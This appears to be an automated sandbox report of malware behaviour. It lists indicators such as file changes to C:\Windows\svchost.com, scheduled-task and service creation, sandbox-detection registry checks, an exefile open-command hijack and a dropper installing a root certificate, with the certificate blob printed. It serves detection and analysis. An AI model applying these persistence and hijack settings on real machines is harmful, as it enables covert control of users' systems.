File opened for modification	C:\Windows\svchost.com	stub.exe
File opened for modification	C:\Windows\directx.sys	stub.exe
File opened for modification	C:\Windows\directx.sys	stub.exe
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	vbc.exe
File opened for modification	C:\Windows\directx.sys	stub.exe
File opened for modification	C:\Windows\svchost.com	stub.exe
File opened for modification	C:\Windows\svchost.com	Conhost.exe
File created	C:\Windows\svchost.exe	stub.exe
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	stub.exe
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	stub.exe
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	stub.exe
File opened for modification	C:\Windows\svchost.com	WerFault.exe
File opened for modification	C:\Windows\directx.sys	stub.exe
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	stub.exe
File opened for modification	C:\Windows\directx.sys	stub.exe
File opened for modification	C:\Windows\svchost.com	ma.exe
File opened for modification	C:\Windows\svchost.com	stub.exe
File opened for modification	C:\Windows\directx.sys	stub.exe
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	stub.exe
File opened for modification	C:\Windows\directx.sys	Conhost.exe
File opened for modification	C:\Windows\svchost.com	reg.exe

Launches sc.exe 20 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
5916	sc.exe
888	sc.exe
6232	sc.exe
4156	sc.exe
6340	sc.exe
7180	sc.exe
4908	sc.exe
236	sc.exe
1968	sc.exe
5080	sc.exe
4928	sc.exe
2780	sc.exe
7232	sc.exe
4164	sc.exe
5324	sc.exe
5936	sc.exe
2832	sc.exe
5588	sc.exe
5904	sc.exe
5256	sc.exe

Detects Pyinstaller 4 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\voice5.13sert.exe	pyinstaller
C:\Users\Admin\AppData\Local\Temp\Files\voice5.13sert.exe	pyinstaller
C:\Users\Admin\AppData\Local\Temp\Files\voice5.13sert.exe	pyinstaller
C:\Users\Admin\AppData\Local\Temp\Files\voice5.13sert.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 20 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3252	4880	WerFault.exe	ghjkl.exe
2828	4880	WerFault.exe	ghjkl.exe
1012	6132	WerFault.exe	2-3-1_2023-12-14_13-35.exe
3448	2108	WerFault.exe	c4fc1686ecf325a5432309a2fec15357f6ff849252747ef44de7b4f1f4d4d1c2.exe
3672	1520	WerFault.exe	nsdD2CF.tmp
5412	2500	WerFault.exe	._cache_pskill.exe
4532	4448	WerFault.exe	._cache_Synaptics.exe
1980	1604	WerFault.exe	ama.exe
3976	840	WerFault.exe	InstallUtil.exe
6228	6064	WerFault.exe	I80HUL~1.EXE
3996	3680	WerFault.exe	G5VUMN~1.EXE
6376	6832	WerFault.exe	._cache_PsExec.exe
7164	5848	WerFault.exe	._cache_PSSERV~1.EXE
6836	5240	WerFault.exe	288C47~1.EXE
664	236	WerFault.exe	data64_1.exe
4760	7468	WerFault.exe	KB^FR_~1.EXE
4264	6760	WerFault.exe	I80HUL~1.EXE
1596	1180	WerFault.exe	G5VUMN~1.EXE
3096	6096	WerFault.exe	JCA0W3~1.EXE
6344	7132	WerFault.exe	._cache_psfile.exe

NSIS installer 4 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\inst77player_1.0.0.1.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\Files\inst77player_1.0.0.1.exe	nsis_installer_2
C:\Users\Admin\AppData\Local\Temp\Files\ninet.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\Files\ninet.exe	nsis_installer_2

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

891b6cff6879ab69ae185a5956987ec46daaf434c60c93589c9ac06e4a4f7005.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	891b6cff6879ab69ae185a5956987ec46daaf434c60c93589c9ac06e4a4f7005.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	891b6cff6879ab69ae185a5956987ec46daaf434c60c93589c9ac06e4a4f7005.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	891b6cff6879ab69ae185a5956987ec46daaf434c60c93589c9ac06e4a4f7005.exe

Creates scheduled task(s) 1 TTPs 26 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
5548	schtasks.exe
2776	schtasks.exe
5904	schtasks.exe
6856	schtasks.exe
400	schtasks.exe
7340	schtasks.exe
1180	schtasks.exe
6056	schtasks.exe
3296	schtasks.exe
7916	schtasks.exe
4980	schtasks.exe
2440	schtasks.exe
6884	schtasks.exe
5524	schtasks.exe
7112	schtasks.exe
7988	schtasks.exe
5904	schtasks.exe
1968	schtasks.exe
7912	schtasks.exe
6528	schtasks.exe
4824	schtasks.exe
2308	schtasks.exe
3316	schtasks.exe
5924	schtasks.exe
6920	schtasks.exe
3332	schtasks.exe

Delays execution with timeout.exe 5 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

4108 timeout.exe
4568 timeout.exe
6108 timeout.exe
3124 timeout.exe
5680 timeout.exe
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

4768 WMIC.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

7992 taskkill.exe

pid	process
4108	timeout.exe
4568	timeout.exe
6108	timeout.exe
3124	timeout.exe
5680	timeout.exe

pid	process
4768	WMIC.exe

pid	process
7992	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe

Modifies registry class 49 IoCs

Processes:

stub.exeninet.exestub.exestub.exestub.exevbc.exestub.exeWerFault.exestub.exema.exestub.exestub.exestub.exestub.exestub.exe4363463463464363463463463.exestub.exestub.exestub.exestub.exereg.exesvchost.comstub.exestub.exeConhost.exesvchost.comstub.exestub.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3213149797-706813642-929964373-1000_Classes\Local Settings	stub.exe
Key created	\REGISTRY\USER\S-1-5-21-3213149797-706813642-929964373-1000_Classes\CLSID\{1F4580E2-FCB5-DCB3-86E8-A5A5CF994189}	ninet.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID	ninet.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\CopyHookHandlers\SharingEx\ = "{2E4580E2-FCB5-DCB3-86E8-A5A5CF994189}"	ninet.exe
Key created	\REGISTRY\USER\S-1-5-21-3213149797-706813642-929964373-1000_Classes\Local Settings	stub.exe
Key created	\REGISTRY\USER\S-1-5-21-3213149797-706813642-929964373-1000_Classes\Local Settings	stub.exe
Key created	\REGISTRY\USER\S-1-5-21-3213149797-706813642-929964373-1000_Classes\CLSID\{1F4580E2-FCB5-DCB3-86E8-A5A5CF994189}\InProcServer32	ninet.exe
Key created	\REGISTRY\USER\S-1-5-21-3213149797-706813642-929964373-1000_Classes\Local Settings	stub.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1F4580E2-FCB5-DCB3-86E8-A5A5CF994189}	ninet.exe
Key created	\REGISTRY\USER\S-1-5-21-3213149797-706813642-929964373-1000_Classes\CLSID\{2E4580E2-FCB5-DCB3-86E8-A5A5CF994189}	ninet.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4580E2-FCB5-DCB3-86E8-A5A5CF994189}\InProcServer32\ThreadingModel = "Apartment"	ninet.exe
Key created	\REGISTRY\USER\S-1-5-21-3213149797-706813642-929964373-1000_Classes\Local Settings	vbc.exe
Key created	\REGISTRY\USER\S-1-5-21-3213149797-706813642-929964373-1000_Classes\Local Settings	stub.exe
Key created	\REGISTRY\USER\S-1-5-21-3213149797-706813642-929964373-1000_Classes\Local Settings	WerFault.exe
Key created	\REGISTRY\USER\S-1-5-21-3213149797-706813642-929964373-1000_Classes\Local Settings	stub.exe
Key created	\REGISTRY\USER\S-1-5-21-3213149797-706813642-929964373-1000_Classes\Local Settings	ma.exe
Key created	\REGISTRY\USER\S-1-5-21-3213149797-706813642-929964373-1000_Classes\Local Settings	stub.exe
Key created	\REGISTRY\USER\S-1-5-21-3213149797-706813642-929964373-1000_Classes\Local Settings	stub.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\CopyHookHandlers\SharingEx	ninet.exe
Key created	\REGISTRY\USER\S-1-5-21-3213149797-706813642-929964373-1000_Classes\Local Settings	stub.exe
Key created	\REGISTRY\USER\S-1-5-21-3213149797-706813642-929964373-1000_Classes\Local Settings	stub.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1F4580E2-FCB5-DCB3-86E8-A5A5CF994189}\InProcServer32	ninet.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4580E2-FCB5-DCB3-86E8-A5A5CF994189}	ninet.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E4580E2-FCB5-DCB3-86E8-A5A5CF994189}\InProcServer32\ThreadingModel = "Apartment"	ninet.exe
Key created	\REGISTRY\USER\S-1-5-21-3213149797-706813642-929964373-1000_Classes\Local Settings	stub.exe
Key created	\REGISTRY\USER\S-1-5-21-3213149797-706813642-929964373-1000_Classes\Local Settings	4363463463464363463463463.exe
Key created	\REGISTRY\USER\S-1-5-21-3213149797-706813642-929964373-1000_Classes\Local Settings	stub.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4580E2-FCB5-DCB3-86E8-A5A5CF994189}\InProcServer32\ = "C:\\Program Files\\Windows Media Player\\Media Renderer\\NppConverter.dll"	ninet.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E4580E2-FCB5-DCB3-86E8-A5A5CF994189}\InProcServer32\ = "C:\\Program Files\\Windows Media Player\\Media Renderer\\NppConverter.dll"	ninet.exe
Key created	\REGISTRY\USER\S-1-5-21-3213149797-706813642-929964373-1000_Classes\Local Settings	stub.exe
Key created	\REGISTRY\USER\S-1-5-21-3213149797-706813642-929964373-1000_Classes\Local Settings	stub.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E4580E2-FCB5-DCB3-86E8-A5A5CF994189}	ninet.exe
Key created	\REGISTRY\USER\S-1-5-21-3213149797-706813642-929964373-1000_Classes\Local Settings	stub.exe
Key created	\REGISTRY\USER\S-1-5-21-3213149797-706813642-929964373-1000_Classes\Local Settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3213149797-706813642-929964373-1000_Classes\Local Settings	svchost.com
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\*\ShellEx\{e357fccd-a995-4576-b01f-234630154e96}	ninet.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E4580E2-FCB5-DCB3-86E8-A5A5CF994189}\InProcServer32	ninet.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	stub.exe
Key created	\REGISTRY\USER\S-1-5-21-3213149797-706813642-929964373-1000_Classes\CLSID	ninet.exe
Key created	\REGISTRY\USER\S-1-5-21-3213149797-706813642-929964373-1000_Classes\CLSID\{2E4580E2-FCB5-DCB3-86E8-A5A5CF994189}\InProcServer32	ninet.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\{e357fccd-a995-4576-b01f-234630154e96}\ = "{1A4580E2-FCB5-DCB3-86E8-A5A5CF994189}"	ninet.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1F4580E2-FCB5-DCB3-86E8-A5A5CF994189}\InProcServer32\ThreadingModel = "Apartment"	ninet.exe
Key created	\REGISTRY\USER\S-1-5-21-3213149797-706813642-929964373-1000_Classes\Local Settings	stub.exe
Key created	\REGISTRY\USER\S-1-5-21-3213149797-706813642-929964373-1000_Classes\Local Settings	Conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4580E2-FCB5-DCB3-86E8-A5A5CF994189}\InProcServer32	ninet.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1F4580E2-FCB5-DCB3-86E8-A5A5CF994189}\InProcServer32\ = "C:\\Program Files\\Windows Media Player\\Media Renderer\\NppConverter.dll"	ninet.exe
Key created	\REGISTRY\USER\S-1-5-21-3213149797-706813642-929964373-1000_Classes\Local Settings	svchost.com
Key created	\REGISTRY\USER\S-1-5-21-3213149797-706813642-929964373-1000_Classes\Local Settings	stub.exe
Key created	\REGISTRY\USER\S-1-5-21-3213149797-706813642-929964373-1000_Classes\Local Settings	stub.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

Posh_v2_dropper_x64.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	Posh_v2_dropper_x64.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb658140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	Posh_v2_dropper_x64.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1492 PING.EXE

pid	process
1492	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

nxmr.exepowershell.exewupgrdsv.exepowershell.exeAppLaunch.exeghjkl.execmd.exepowershell.exeninet.exeStringIds.exepowershell.exe891b6cff6879ab69ae185a5956987ec46daaf434c60c93589c9ac06e4a4f7005.exeExplorer.EXE

pid	process
4188	nxmr.exe
4188	nxmr.exe
1148	powershell.exe
1148	powershell.exe
4188	nxmr.exe
4188	nxmr.exe
4816	wupgrdsv.exe
4816	wupgrdsv.exe
4032	powershell.exe
4032	powershell.exe
4816	wupgrdsv.exe
4816	wupgrdsv.exe
5588	AppLaunch.exe
5588	AppLaunch.exe
4880	ghjkl.exe
4880	ghjkl.exe
5588	AppLaunch.exe
5588	AppLaunch.exe
5588	AppLaunch.exe
5588	AppLaunch.exe
5680	cmd.exe
5680	cmd.exe
5680	cmd.exe
5680	cmd.exe
4572	powershell.exe
4572	powershell.exe
2372	ninet.exe
2372	ninet.exe
2372	ninet.exe
2372	ninet.exe
2372	ninet.exe
2372	ninet.exe
2372	ninet.exe
2372	ninet.exe
1364	StringIds.exe
1364	StringIds.exe
1364	StringIds.exe
1364	StringIds.exe
3624	powershell.exe
3624	powershell.exe
4268	891b6cff6879ab69ae185a5956987ec46daaf434c60c93589c9ac06e4a4f7005.exe
4268	891b6cff6879ab69ae185a5956987ec46daaf434c60c93589c9ac06e4a4f7005.exe
3280	Explorer.EXE
3280	Explorer.EXE
3280	Explorer.EXE
3280	Explorer.EXE
3280	Explorer.EXE
3280	Explorer.EXE
3280	Explorer.EXE
3280	Explorer.EXE
3280	Explorer.EXE
3280	Explorer.EXE
3280	Explorer.EXE
3280	Explorer.EXE
3280	Explorer.EXE
3280	Explorer.EXE
3280	Explorer.EXE
3280	Explorer.EXE
3280	Explorer.EXE
3280	Explorer.EXE
3280	Explorer.EXE
3280	Explorer.EXE
3280	Explorer.EXE
3280	Explorer.EXE

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

680
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

891b6cff6879ab69ae185a5956987ec46daaf434c60c93589c9ac06e4a4f7005.exe

pid process

4268 891b6cff6879ab69ae185a5956987ec46daaf434c60c93589c9ac06e4a4f7005.exe

pid	process
680

pid	process
4268	891b6cff6879ab69ae185a5956987ec46daaf434c60c93589c9ac06e4a4f7005.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

4363463463464363463463463.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	784	4363463463464363463463463.exe
Token: SeDebugPrivilege	1148	powershell.exe
Token: SeIncreaseQuotaPrivilege	1148	powershell.exe
Token: SeSecurityPrivilege	1148	powershell.exe
Token: SeTakeOwnershipPrivilege	1148	powershell.exe
Token: SeLoadDriverPrivilege	1148	powershell.exe
Token: SeSystemProfilePrivilege	1148	powershell.exe
Token: SeSystemtimePrivilege	1148	powershell.exe
Token: SeProfSingleProcessPrivilege	1148	powershell.exe
Token: SeIncBasePriorityPrivilege	1148	powershell.exe
Token: SeCreatePagefilePrivilege	1148	powershell.exe
Token: SeBackupPrivilege	1148	powershell.exe
Token: SeRestorePrivilege	1148	powershell.exe
Token: SeShutdownPrivilege	1148	powershell.exe
Token: SeDebugPrivilege	1148	powershell.exe
Token: SeSystemEnvironmentPrivilege	1148	powershell.exe
Token: SeRemoteShutdownPrivilege	1148	powershell.exe
Token: SeUndockPrivilege	1148	powershell.exe
Token: SeManageVolumePrivilege	1148	powershell.exe
Token: 33	1148	powershell.exe
Token: 34	1148	powershell.exe
Token: 35	1148	powershell.exe
Token: 36	1148	powershell.exe
Token: SeIncreaseQuotaPrivilege	1148	powershell.exe
Token: SeSecurityPrivilege	1148	powershell.exe
